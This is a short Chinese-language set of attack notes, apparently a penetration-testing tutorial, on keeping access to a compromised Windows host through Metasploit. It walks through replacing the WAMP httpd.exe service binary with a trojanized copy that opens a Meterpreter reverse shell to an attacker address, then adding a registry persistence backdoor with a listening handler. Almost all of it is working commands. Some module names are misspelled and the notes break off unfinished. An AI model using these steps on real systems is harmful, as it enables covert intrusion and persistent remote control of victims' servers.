一 在守护进行执行文件中注入后门
在获得meterpreter1之后安装后门的步骤
# 查看系统中有哪些进程,查看在哪些守护进程中安装后门
# 这里使用的服务器是wamp
ps -S httpd.exe
# 停止http服务进程
pkill httpd.exe
# 寻找改进程执行文件的位置
search -f httpd.exe -d C:\
# 下载该服务的执行文件
download C:\\httpd.exe
# 然后将meterpreter1放入后台
background
在服务器执行文件上安装后门
# 从meterpreter1返回到msfconsole
# 在服务执行文件上安装后门,默认端口4444
use payload/windows/x64/metepreter/reverse_tcp #后门上安装的shell
set lhost 192.168.10.115
generate -a x64 -p Windows -x httpd.exe -k -t exe -f http_backdoor.exe
后门制作结束
generate
-a 处理器架构
-p 操作系统平台
-x 后台使用的模板
-t 文件格式
-f 生成的后门文件
准备接受后台反弹的shell
use exploit/mulit/handler
set payload payload/windows/x64/metepreter/reverse_tcp # payload需要与后门上安装的相同
set lhost 192.168.10.115 #后门的shell只会发往115
exploit -j # -j 允许在后台持续监听
进入meterpreter1安装后门
# 切换到服务执行文件所在的目录
cd C:\
# 将原始的服务执行文件备份
mv httpd.exe httpd-backup.exe
# 上传制作的后门文件
upload http_backdoor.exe
# 将后门文件更改为原先的名字
mv http_backdoor.exe httpd.exe
# 切换到目标机器的system sheel
shell
# 这个httpd是wampapache服务器的,停止wampapache,在开启wampapache
net stop wampapache
net start wampapache #会直接启动httpd.exe
# 执行之后,系统就接受到了
二 在注册表中安装后门
# 前提要有一个meterpreter,这个meterpreter放入后天,假设session值为1
use exploit/windows/local/registry_persistence
set session 1 #目的是当前需要一个shell能够操作目标机器的注册表
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.115
exploit
# 需要在攻击机上监听可能返回的shell
use exploit/muilt/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.115
run -j #进入后台监听
还有几个
